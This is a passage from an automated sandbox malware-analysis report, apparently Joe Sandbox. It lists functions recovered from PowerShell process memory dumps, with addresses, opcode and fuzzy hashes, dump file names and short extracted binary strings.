                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: ae398f564e8fc65f1994703832c7eb3533ddefa5c906de6015777f4c5b3d3cf3
                                                                                                                                                            • Instruction ID: 066380f7890cc0a0434e6262e20f5f01061978b2941148f3252ead9444ff324d
                                                                                                                                                            • Opcode Fuzzy Hash: ae398f564e8fc65f1994703832c7eb3533ddefa5c906de6015777f4c5b3d3cf3
                                                                                                                                                            • Instruction Fuzzy Hash: 27E1C430A0DA4E8FEBA8DF28C8657E977D1FF58310F04426ED84DC72A5DE78A9458781
                                                                                                                                                            Function 00007FFD9B975289 Relevance: 1.6, Strings: 1, Instructions: 330COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.1998920250.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: ?_H
                                                                                                                                                            • API String ID: 0-1095511010
                                                                                                                                                            • Opcode ID: 484934d6ca4c566a99bd05d15297a877a3cf9744856386b7ee7be7eec8273a59
                                                                                                                                                            • Instruction ID: 7b1c106661f555c81d402f91630e5247b852efda416ea07f54007264de5293eb
                                                                                                                                                            • Opcode Fuzzy Hash: 484934d6ca4c566a99bd05d15297a877a3cf9744856386b7ee7be7eec8273a59
                                                                                                                                                            • Instruction Fuzzy Hash: BBA15722B1FA8D5FEBE5DB6848A56747BD1EF55350B1900FBD44CCB1E3EA08AC058341
                                                                                                                                                            Function 00007FFD9B8ACD0D Relevance: 1.0, Instructions: 998COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.1998273422.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: aa56d4421b78b715529953289d41f06fa48e6770e528f4b8e015bab7fe02596f
                                                                                                                                                            • Instruction ID: cf111ddd4fba3ebdf9f4dbb1fc179a7c6b1a1613d9967cfeab6c7ef059d41884
                                                                                                                                                            • Opcode Fuzzy Hash: aa56d4421b78b715529953289d41f06fa48e6770e528f4b8e015bab7fe02596f
                                                                                                                                                            • Instruction Fuzzy Hash: 9D42A231B18A4D8FDB58EF5CD4A5AE97BE1FF98314F14417AD009D7296DA34B842CB80
                                                                                                                                                            Function 00007FFD9B9797A4 Relevance: .4, Instructions: 445COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.1998920250.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 036902b8cf8a373daf266e735cb9efb301f918473d6609b5a3c7abbbab74a3e5
                                                                                                                                                            • Instruction ID: a15171eef767725c6450643807c2d2b34c7d431663c685f7cb8f1f8c5478fce9
                                                                                                                                                            • Opcode Fuzzy Hash: 036902b8cf8a373daf266e735cb9efb301f918473d6609b5a3c7abbbab74a3e5
                                                                                                                                                            • Instruction Fuzzy Hash: 85D12532B1EB892FE765DB6C48A85B47BE1EF56210B0901FBD05DCB1E3DA19AD05C381
                                                                                                                                                            Function 00007FFD9B9741C9 Relevance: .4, Instructions: 371COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.1998920250.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 9896ca16132f3d1404c5dd9fbbe48bfba018d642604aa77a27f3602aeda18351
                                                                                                                                                            • Instruction ID: 27f56ac178382ef34413c1ba11952dfac3575e79c101d3f8d96b68be351a49df
                                                                                                                                                            • Opcode Fuzzy Hash: 9896ca16132f3d1404c5dd9fbbe48bfba018d642604aa77a27f3602aeda18351
                                                                                                                                                            • Instruction Fuzzy Hash: 41A16C22B1FB8E1FE7B9D66858B567837D1EF52610B0901BFD45DC32E3EE08A9058342
                                                                                                                                                            Function 00007FFD9B8AB4E6 Relevance: .3, Instructions: 333COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.1998273422.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: a1df8efe82ded9dc8736ae3a372e9baa6a19d2004a43bbc67a0f540cb2921787
                                                                                                                                                            • Instruction ID: d377e54aebd264135bafd0b034561b36779d08e4e5f81459c273a65383618a3b
                                                                                                                                                            • Opcode Fuzzy Hash: a1df8efe82ded9dc8736ae3a372e9baa6a19d2004a43bbc67a0f540cb2921787
                                                                                                                                                            • Instruction Fuzzy Hash: 77B1E73060DA8D8FEB68DF28D8557E93BD1FF59310F04426EE84DC7292DA74A945CB82
                                                                                                                                                            Function 00007FFD9B97A1BA Relevance: .2, Instructions: 218COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.1998920250.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 037f267d08aca16f71dc3ca97e3587d5176a5fa827bfa13c52664304113a989f
                                                                                                                                                            • Instruction ID: 3ae6fe71c311ede1bc78038949a34b76187bcaa061d3c7ae63cac40b8099d87f
                                                                                                                                                            • Opcode Fuzzy Hash: 037f267d08aca16f71dc3ca97e3587d5176a5fa827bfa13c52664304113a989f
                                                                                                                                                            • Instruction Fuzzy Hash: 5E61D121A1F7CD5FEB669B6858A15A47FE1EF53210B0901FBD488CB0E3DA19AD09C352
                                                                                                                                                            Function 00007FFD9B97A726 Relevance: .2, Instructions: 177COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.1998920250.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 1f4b07f8684807df52397c517372c68f5f025fb0712c92828fd0097a70456742
                                                                                                                                                            • Instruction ID: 3fe05b1481708d5b6d1f6c74ac567409f40fd01c4c6b2bde36d8591f8471ca74
                                                                                                                                                            • Opcode Fuzzy Hash: 1f4b07f8684807df52397c517372c68f5f025fb0712c92828fd0097a70456742
                                                                                                                                                            • Instruction Fuzzy Hash: C3511632F1EA890FE769DB5898A16A8B7E1EF65310F0901BED05CC71E3DE186D458742
                                                                                                                                                            Function 00007FFD9B9792A6 Relevance: .2, Instructions: 170COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.1998920250.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 58fa5d39676b63f9bf0903f2fcee9c8e673e83676dfcdc148a1f7fb43be286b9
                                                                                                                                                            • Instruction ID: fd445653aa03c97ef089a802977de870618d1015dc32e281c96dac4e491ead18
                                                                                                                                                            • Opcode Fuzzy Hash: 58fa5d39676b63f9bf0903f2fcee9c8e673e83676dfcdc148a1f7fb43be286b9
                                                                                                                                                            • Instruction Fuzzy Hash: 9D515932A1EA891FE764DB6C88A96A4B7E1FF91310F1900FED09C871E3DE2879058741
                                                                                                                                                            Function 00007FFD9B979F1A Relevance: .2, Instructions: 169COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.1998920250.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: a3355e1764b8d46c7018d58912839028992f771c611c28e1c5e558a538246d8d
                                                                                                                                                            • Instruction ID: 1c1a9129ad6ceb207861306919f74943588555f7c9924700063a8214521d7a6c
                                                                                                                                                            • Opcode Fuzzy Hash: a3355e1764b8d46c7018d58912839028992f771c611c28e1c5e558a538246d8d
                                                                                                                                                            • Instruction Fuzzy Hash: 68515932B1E7891FEB65EA584CA56A8B7D1FF62310F1801BED05CC71D3DE286D058782
                                                                                                                                                            Function 00007FFD9B979F02 Relevance: .2, Instructions: 153COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.1998920250.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 698a30417b64df08ab4b131753c2ead987643d9867d10d26a0a523afad91b9da
                                                                                                                                                            • Instruction ID: 6dd2d312ffc647659ab3de0116d61083755a49e8171c9ee5f68d19709e7b049d
                                                                                                                                                            • Opcode Fuzzy Hash: 698a30417b64df08ab4b131753c2ead987643d9867d10d26a0a523afad91b9da
                                                                                                                                                            • Instruction Fuzzy Hash: ED416B22B1EA891FE765DAAC48B52A877D1FF52750F2801FED06CC71E3DE186C058382
                                                                                                                                                            Function 00007FFD9B975382 Relevance: .1, Instructions: 114COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.1998920250.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 42f6d0cbf24317295401f09326107f2677a7eb13d8e213b71b87bc2e8adf9228
                                                                                                                                                            • Instruction ID: f54bf920ed86253e499944128f31108ae0aba28ed89ec3f841ace870f4ff3621
                                                                                                                                                            • Opcode Fuzzy Hash: 42f6d0cbf24317295401f09326107f2677a7eb13d8e213b71b87bc2e8adf9228
                                                                                                                                                            • Instruction Fuzzy Hash: CA313712F2FACE5BEBF5976818B627867C1EF00751B6A01FAD45CCB1F2EE086C004241
                                                                                                                                                            Function 00007FFD9B974354 Relevance: .1, Instructions: 100COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.1998920250.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 4b833df29b9d71aaa7951bca7259edfc32e364f8743c2526bf3ebcad4984a593
                                                                                                                                                            • Instruction ID: 33f588a0e3a21e060937910c2d41d9ca5adbd516db61645a924b96ecbc8df8a8
                                                                                                                                                            • Opcode Fuzzy Hash: 4b833df29b9d71aaa7951bca7259edfc32e364f8743c2526bf3ebcad4984a593
                                                                                                                                                            • Instruction Fuzzy Hash: 07210922F2FA4E5BE7B9966C18B537C67C2EF81650B5901BED05CC72E3EE19BC015201
                                                                                                                                                            Function 00007FFD9B8AAFE4 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.1998273422.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: e6ac59b578cec2c427730387da2c3b5852c97882512bf2c521fdba1d489bb730
                                                                                                                                                            • Instruction ID: 6647219333622f606d6c8291ec0e411cda163065b12aaa4f020c4df055735159
                                                                                                                                                            • Opcode Fuzzy Hash: e6ac59b578cec2c427730387da2c3b5852c97882512bf2c521fdba1d489bb730
                                                                                                                                                            • Instruction Fuzzy Hash: 0B315230A1964ECEFBB4AF54CC6AFF932D4FF49318F410139D45D860A2DA396A85CB61
                                                                                                                                                            Function 00007FFD9B97121F Relevance: .1, Instructions: 80COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.1998920250.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 99864e7bfac27542477ba9a894faeb0844c52d953cb45461641d6813376cb186
                                                                                                                                                            • Instruction ID: 158d95f831e6e9ac08544cf3b88fed167f3cafed268e48817b9ba4c8eba767e1
                                                                                                                                                            • Opcode Fuzzy Hash: 99864e7bfac27542477ba9a894faeb0844c52d953cb45461641d6813376cb186
                                                                                                                                                            • Instruction Fuzzy Hash: 8D210353F1F6DA1FE7A1967808F50642BD1EF6665470900FED0A9CB1E7EC0C6C098311
                                                                                                                                                            Function 00007FFD9B978F4B Relevance: .1, Instructions: 60COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.1998920250.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 3f3b76edb185bbc374dc4cff2f5740cc176e858c9af1cf3fb2be6edbfa854974
                                                                                                                                                            • Instruction ID: 8c3988ff8df1975c3faeecf00c24100cd50f2f60d1bd5d002ae603245ee78dc1
                                                                                                                                                            • Opcode Fuzzy Hash: 3f3b76edb185bbc374dc4cff2f5740cc176e858c9af1cf3fb2be6edbfa854974
                                                                                                                                                            • Instruction Fuzzy Hash: 66112921B1FAC91FE7A5EA6948E19657BD2DF1121035D00FAC048CB1E3D808AC0483C1
                                                                                                                                                            Function 00007FFD9B8A3945 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.1998273422.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                            • Instruction ID: 04b822a5e3d45822b76be075df3c081dc68bfd048355e8304278f52f19c5101e
                                                                                                                                                            • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                            • Instruction Fuzzy Hash: F401677121CB0D4FD748EF0CE451AA5B7E0FB99364F10056DE58AC36A5D636E881CB45
                                                                                                                                                            Function 00007FFD9B97896A Relevance: .0, Instructions: 37COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.1998920250.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: b7b3d75609fd20a156d0d68fc778d32a9f4dcd5ef558f1f6592d1c36b4193c01
                                                                                                                                                            • Instruction ID: dc1e031570e4ce9f83471ddb994d0a48f1fcd9d3d00dd24ad612c2a9ca9eb010
                                                                                                                                                            • Opcode Fuzzy Hash: b7b3d75609fd20a156d0d68fc778d32a9f4dcd5ef558f1f6592d1c36b4193c01
                                                                                                                                                            • Instruction Fuzzy Hash: 4DF0E533B5D90D0AE395966C58651F9B3D2DFC4131B450177C15EC3196EE15D4074241
                                                                                                                                                            Function 00007FFD9B978D29 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.1998920250.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffd9b970000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: f1d534e0149aa8686b56ea6cc58410b57baf7f564fd7f1515bbd6f2e8af3afbf
                                                                                                                                                            • Instruction ID: f0e526672050564cb295ea798771b5402b58897891ce31a67132d29b4bbee97e
                                                                                                                                                            • Opcode Fuzzy Hash: f1d534e0149aa8686b56ea6cc58410b57baf7f564fd7f1515bbd6f2e8af3afbf
                                                                                                                                                            • Instruction Fuzzy Hash: ACE0DF33B1EA090AFB5DA5AC28A25F8B3D1DF81120B48087FD14EC3487E91AA8120245

                                                                                                                                                            Executed Functions

                                                                                                                                                            Function 04A2E6A8 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2159622273.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_4a20000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: \V=m
                                                                                                                                                            • API String ID: 0-2437245023
                                                                                                                                                            • Opcode ID: e8915e6783d413b389b1152dd32f6855dd7329c85069e8de472bed61c4731358
                                                                                                                                                            • Instruction ID: 1a8bb2851c2c98e3b70229b71e5a65f7ded07e0b3255acffff7345ad5ef540d2
                                                                                                                                                            • Opcode Fuzzy Hash: e8915e6783d413b389b1152dd32f6855dd7329c85069e8de472bed61c4731358
                                                                                                                                                            • Instruction Fuzzy Hash: 1DB16F70E00229DFDF14CFADCA8579EBBF2BF88304F148529D855A7254EB74A885DB81
                                                                                                                                                            Function 04A2EF78 Relevance: .3, Instructions: 266COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2159622273.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_4a20000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: ed8cb5f3ff641d3bef151ee5058c7bf4d4d92f514daed58f83a8a4daded0b805
                                                                                                                                                            • Instruction ID: 0a82d097a28317e5d2bc45799f0f52181c4c6a33469412f39fa4a6a06cd37f2e
                                                                                                                                                            • Opcode Fuzzy Hash: ed8cb5f3ff641d3bef151ee5058c7bf4d4d92f514daed58f83a8a4daded0b805
                                                                                                                                                            • Instruction Fuzzy Hash: 9EB18170E04219CFEF10CFADCA8179DBBF2AF49714F148529E815EB254EB74A845EB81
                                                                                                                                                            Function 04A28F99 Relevance: .1, Instructions: 118COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2159622273.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_4a20000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 758e1da6cb14e80d5a1408b393366f8b4bf06f751a279ee3807a578c677ad70d
                                                                                                                                                            • Instruction ID: 11dadc91bcd55d45d6279799298b0430addd080db112e6f4901ec53697f59b5a
                                                                                                                                                            • Opcode Fuzzy Hash: 758e1da6cb14e80d5a1408b393366f8b4bf06f751a279ee3807a578c677ad70d
                                                                                                                                                            • Instruction Fuzzy Hash: 08418F34B00214CFD718DF69CA58AAEBBF6EF89750F144468E406EB7A0CB35AC41DB50
                                                                                                                                                            Function 078327A0 Relevance: 18.1, Strings: 14, Instructions: 618COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                            • API String ID: 0-3077448208
                                                                                                                                                            • Opcode ID: 0b95eb8d404f784042e57d0031fa1abd8205580baf8d6237233b26968ddec91c
                                                                                                                                                            • Instruction ID: bf897e22da139d3f2f48cec1e22c6dcbfec3000031c37d0ac529056bfece9061
                                                                                                                                                            • Opcode Fuzzy Hash: 0b95eb8d404f784042e57d0031fa1abd8205580baf8d6237233b26968ddec91c
                                                                                                                                                            • Instruction Fuzzy Hash: 261238B1B0430A9FCB258F2DD8546AABBA1BFA5320F1884ABD445DF252DB31D845C7E1
                                                                                                                                                            Function 07835CF0 Relevance: 13.5, Strings: 10, Instructions: 1041COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
                                                                                                                                                            • API String ID: 0-2890353280
                                                                                                                                                            • Opcode ID: d5145a626d1463ed829fb3052512c31509c35a21c44d34d250533f174b995371
                                                                                                                                                            • Instruction ID: 867e724e32c5546d51adccb90fff7846f163b233c5a100ccc9dcb1ef1be1996d
                                                                                                                                                            • Opcode Fuzzy Hash: d5145a626d1463ed829fb3052512c31509c35a21c44d34d250533f174b995371
                                                                                                                                                            • Instruction Fuzzy Hash: 9E929EB0B00209DFDB24DF6CC950B6ABBB2AF95304F1485AAD505AB395DB31EC85CBD1
                                                                                                                                                            Function 04A2ABB0 Relevance: 10.5, Strings: 8, Instructions: 520COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2159622273.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_4a20000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 8N=m$Hbq$h]=m$h]=m$h]=m$$^q$$^q$I=m
                                                                                                                                                            • API String ID: 0-2418749994
                                                                                                                                                            • Opcode ID: 60ece6433abf399187b94a705164f202ae476450ea155f7d908f16c7526b4123
                                                                                                                                                            • Instruction ID: 2d79801659bd6f678f2b43b85a16c3b8ebe910725c0297680d78c6f88fc1efb5
                                                                                                                                                            • Opcode Fuzzy Hash: 60ece6433abf399187b94a705164f202ae476450ea155f7d908f16c7526b4123
                                                                                                                                                            • Instruction Fuzzy Hash: 5F226534B002248FCB25DF28C954BADBBB2BF89304F1444A9D50AAB365DF35AD85DF91
                                                                                                                                                            Function 078377D0 Relevance: 7.8, Strings: 6, Instructions: 339COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_7830000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                                                                                                            • API String ID: 0-2822668367
                                                                                                                                                            • Opcode ID: 6cc975d6860e4cef17baa56a860923b68e50b62e9f4ae56e1f346183a0b2193b
                                                                                                                                                            • Instruction ID: 418d8614e0341cc88f39c252d7e69f5e8b23cacf55bf7c23a7badc8a37e3db67
                                                                                                                                                            • Opcode Fuzzy Hash: 6cc975d6860e4cef17baa56a860923b68e50b62e9f4ae56e1f346183a0b2193b
                                                                                                                                                            • Instruction Fuzzy Hash: 26D1AEB0A402099FCB18DF6CC594BAEBBA2AF98314F11C568D501AF395CB75EC85CBD1
                                                                                                                                                            Function 07831020 Relevance: 5.4, Strings: 4, Instructions: 423COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.2207111992.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
